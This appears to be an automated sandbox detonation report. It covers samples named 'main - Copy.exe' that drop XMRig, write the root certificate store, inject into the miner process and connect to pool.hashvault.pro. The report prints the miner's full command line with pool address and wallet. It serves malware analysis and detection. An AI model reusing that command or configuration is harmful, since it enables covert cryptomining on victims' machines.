| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1460 wrote to memory of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1460 wrote to memory of 1428 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1428-16-0x00000233230B0000-0x00000233230D0000-memory.dmp
memory/1428-17-0x0000023323120000-0x0000023323140000-memory.dmp
memory/1428-18-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-20-0x0000023323160000-0x0000023323180000-memory.dmp
memory/1428-19-0x0000023323140000-0x0000023323160000-memory.dmp
memory/1428-21-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-22-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-25-0x0000023323160000-0x0000023323180000-memory.dmp
memory/1428-24-0x0000023323140000-0x0000023323160000-memory.dmp
memory/1428-23-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-26-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-27-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-28-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-29-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-30-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-31-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-32-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-33-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-34-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-35-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-36-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-37-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-38-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-39-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-40-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-41-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-42-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-43-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-44-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-45-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-46-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-47-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-48-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-49-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-50-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-51-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-52-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-53-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-54-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-55-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-56-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-57-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-58-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-59-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-60-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-61-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-62-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-63-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-64-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-65-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-66-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-67-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-68-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-69-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-70-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-71-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-72-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-73-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-74-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-75-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-76-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-77-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-78-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-79-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-80-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-81-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-82-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-83-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
memory/1428-84-0x00007FF76D670000-0x00007FF76E173000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:32
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1836 wrote to memory of 3560 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1836 wrote to memory of 3560 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3560-16-0x00000241238B0000-0x00000241238D0000-memory.dmp
memory/3560-17-0x00000241238F0000-0x0000024123910000-memory.dmp
memory/3560-18-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-20-0x0000024123930000-0x0000024123950000-memory.dmp
memory/3560-19-0x0000024123910000-0x0000024123930000-memory.dmp
memory/3560-21-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-22-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-23-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-24-0x0000024123910000-0x0000024123930000-memory.dmp
memory/3560-25-0x0000024123930000-0x0000024123950000-memory.dmp
memory/3560-26-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
memory/3560-27-0x00007FF6B9BF0000-0x00007FF6BA6F3000-memory.dmp
